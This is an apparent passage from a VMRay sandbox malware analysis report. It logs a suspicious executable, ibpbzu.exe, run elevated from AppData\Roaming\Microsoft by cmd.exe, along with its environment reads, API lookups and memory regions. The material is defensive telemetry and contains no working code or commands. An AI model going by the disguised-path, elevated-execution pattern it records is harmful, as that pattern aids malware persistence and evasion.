Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ffb21a70a40 True 1
Fn
Environment (12)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #37: ibpbzu.exe
11 0
»
Information Value
ID #37
File Name c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe
Command Line C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:45, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x608
Parent PID 0xf0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B60
0x EBC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00057fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable True False False -
winnlsres.dll 0x001d0000 0x001d4fff Memory Mapped File Readable False False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f1fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
ibpbzu.exe 0x00400000 0x00557fff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00560000 0x00624fff Memory Mapped File Readable False False False -
private_0x0000000000630000 0x00630000 0x0066ffff Private Memory Readable, Writable True False False -
private_0x0000000000670000 0x00670000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x0000000000670000 0x00670000 0x00670fff Pagefile Backed Memory Readable, Writable True False False -
winnlsres.dll.mui 0x00680000 0x0068ffff Memory Mapped File Readable False False False -
private_0x00000000006a0000 0x006a0000 0x006affff Private Memory Readable, Writable True False False -
private_0x0000000000730000 0x00730000 0x0082ffff Private Memory Readable, Writable True False False -
private_0x0000000000830000 0x00830000 0x0092ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000930000 0x00930000 0x00b37fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b40000 0x00b40000 0x00cc0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000cd0000 0x00cd0000 0x020cffff Pagefile Backed Memory Readable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73e40000 0x74077fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x740e0000 0x741d2fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x756f0000 0x75807fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x75c70000 0x75ce8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76110000 0x76134fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76300000 0x7643bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76440000 0x76460fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x770f0000 0x77247fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x772a0000 0x772b5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ffb2498ffff Private Memory Readable True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Module (7)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75ae0000 True 2
Fn
Get Filename - process_name = c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75af4ae0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75af4b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75af4b40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75af4b00 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image